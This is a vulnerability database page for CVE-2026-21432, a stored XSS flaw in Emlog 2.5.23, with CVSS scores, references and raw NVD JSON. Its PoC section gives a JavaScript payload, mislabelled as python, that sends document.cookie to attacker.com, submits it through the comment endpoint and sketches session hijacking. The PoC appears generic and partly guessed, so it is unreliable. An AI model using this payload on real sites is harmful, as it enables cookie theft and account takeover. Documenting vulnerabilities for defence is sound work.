CVE-2026-21432

Description

Emlog is an open source website building system. Version 2.5.23 has a stored cross-site scripting vulnerability that can lead to account takeover, including takeover of admin accounts. As of time of publication, no known patched versions are available.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:2.5.23:*:*:*:pro:*:*:* - VULNERABLE

Emlog 2.5.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-21432 Stored XSS PoC for Emlog 2.5.23
// Attack vector: Inject malicious JavaScript in comment/content field

// Step 1: Prepare the XSS payload
const xssPayload = '<script>\n'
    + 'fetch("https://attacker.com/steal?c=" + encodeURIComponent(document.cookie));\n'
    + '</script>';

// Step 2: Submit the payload (requires low-privilege account)
// POST request to comment submission endpoint
const submitComment = async (targetUrl, sessionCookie) => {
    const response = await fetch(targetUrl + '/admin/comment.php?action=add', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': sessionCookie
        },
        body: `content=${encodeURIComponent(xssPayload)}&gid=1`
    });
    return response.status;
};

// Step 3: Wait for victim to visit the page with stored XSS
// The malicious script will execute and exfiltrate cookies

// Step 4: Use stolen cookies to hijack account
const hijackAccount = async (stolenCookie) => {
    // Set stolen cookie and access admin panel
    document.cookie = stolenCookie;
    window.location.href = '/admin/';
};

console.log('XSS Payload prepared:', xssPayload);
console.log('Submit to Emlog 2.5.23 comment field');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21432
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21432
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21432/
[4] VulDB https://vuldb.com/cve/CVE-2026-21432
[5] https://github.com/emlog/emlog/security/advisories/GHSA-4rxf-mjqx-c464

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21432", "sourceIdentifier": "[email protected]", "published": "2026-01-02T19:15:48.020", "lastModified": "2026-01-16T17:13:09.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. Version 2.5.23 has a stored cross-site scripting vulnerability that can lead to account takeover, including takeover of admin accounts. As of time of publication, no known patched versions are available."}, {"lang": "es", "value": "Emlog es un sistema de creación de sitios web de código abierto. La versión 2.5.23 tiene una vulnerabilidad de cross-site scripting almacenado que puede llevar a la toma de control de cuentas, incluyendo la toma de control de cuentas de administrador. A la fecha de publicación, no hay versiones parcheadas conocidas disponibles."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:2.5.23:*:*:*:pro:*:*:*", "matchCriteriaId": "CBBD3D75-C2B3-4727-9B9E-6408956E4ADB"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/security/advisories/GHSA-4rxf-mjqx-c464", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}